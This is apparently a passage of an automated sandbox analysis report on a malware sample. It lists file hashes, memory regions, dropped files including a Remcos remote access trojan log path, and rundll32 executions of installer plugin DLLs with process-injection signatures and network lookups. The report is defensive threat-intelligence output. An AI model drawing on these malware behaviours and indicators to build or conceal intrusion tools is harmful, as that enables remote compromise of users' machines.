| SHA512 | c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe |
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\UserInfo.dll
| MD5 | acbda33dd5700c122e2fe48e3d4351fd |
| SHA1 | 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8 |
| SHA256 | 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0 |
| SHA512 | d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd |
memory/3220-24-0x000000007336E000-0x000000007336F000-memory.dmp
memory/3220-25-0x0000000004AA0000-0x0000000004AD6000-memory.dmp
memory/3220-26-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-27-0x00000000052A0000-0x00000000058C8000-memory.dmp
memory/3220-28-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-29-0x0000000005190000-0x00000000051B2000-memory.dmp
memory/3220-30-0x0000000005230000-0x0000000005296000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhnqlb3m.fum.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3220-33-0x00000000059D0000-0x0000000005A36000-memory.dmp
memory/3220-37-0x0000000005AC0000-0x0000000005E14000-memory.dmp
memory/3220-42-0x00000000060E0000-0x00000000060FE000-memory.dmp
memory/3220-43-0x0000000006120000-0x000000000616C000-memory.dmp
memory/3220-44-0x0000000006650000-0x00000000066E6000-memory.dmp
memory/3220-46-0x00000000072D0000-0x00000000072F2000-memory.dmp
memory/3220-45-0x0000000006600000-0x000000000661A000-memory.dmp
memory/3220-47-0x00000000078B0000-0x0000000007E54000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San
| MD5 | bf1ebfd1285dd7ef43a587e9f51a8e33 |
| SHA1 | 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4 |
| SHA256 | de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff |
| SHA512 | 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389 |
memory/3220-49-0x00000000084E0000-0x0000000008B5A000-memory.dmp
memory/3220-51-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-52-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-53-0x0000000073360000-0x0000000073B10000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non
| MD5 | afc1982fff88592a55312010cfc773c6 |
| SHA1 | c57e918c5149ca9c2a331a78ecef84ffc667feb7 |
| SHA256 | 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0 |
| SHA512 | f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e |
memory/3220-55-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-56-0x0000000008B60000-0x000000000D71C000-memory.dmp
memory/3220-58-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-57-0x000000007336E000-0x000000007336F000-memory.dmp
memory/3220-60-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-61-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-74-0x0000000008B60000-0x000000000D71C000-memory.dmp
memory/2468-76-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1760-77-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2468-80-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3700-84-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3700-83-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3700-82-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1760-81-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1760-79-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2468-78-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3220-90-0x00000000067E0000-0x00000000067F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc
| MD5 | 60e30555becdb968406edb87fff512ef |
| SHA1 | 65551417f6371c40e6d5dab38fe87ab634f9446e |
| SHA256 | 9e347aa1a363532c72d7728abe1afdc48b9418fae8cbf8bcbc50c9c22dfefa57 |
| SHA512 | cbe1aebf171b54f481028208aa85fb04145cc40772cc30e67107caa5cc70c73f274da362766f125093c1fab1416c687744e53e0f7c30b6ead866c6f6ba671449 |
memory/3220-94-0x00000000067E0000-0x00000000067F9000-memory.dmp
memory/3220-93-0x00000000067E0000-0x00000000067F9000-memory.dmp
memory/3220-100-0x0000000073360000-0x0000000073B10000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 434c9f981eadaffbec7aa8743e23e311 |
| SHA1 | d9454d2aaf51e2b1f4660c28006954234963b962 |
| SHA256 | 2668d8f69a8ada3b2740a5ac2fe5ed1c8fba11a658c62647aa98a526870ba708 |
| SHA512 | 60a9589eb71556df85a12b633103d7b5246685f353a11ed5aeb8a7cca926e7d193ebb176a770d817b9df16dba12ea1381dc759c888ca3776f5aad8b7b2c7e976 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240705-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 220
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
94s
Max time network
132s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2224 -ip 2224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240705-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 240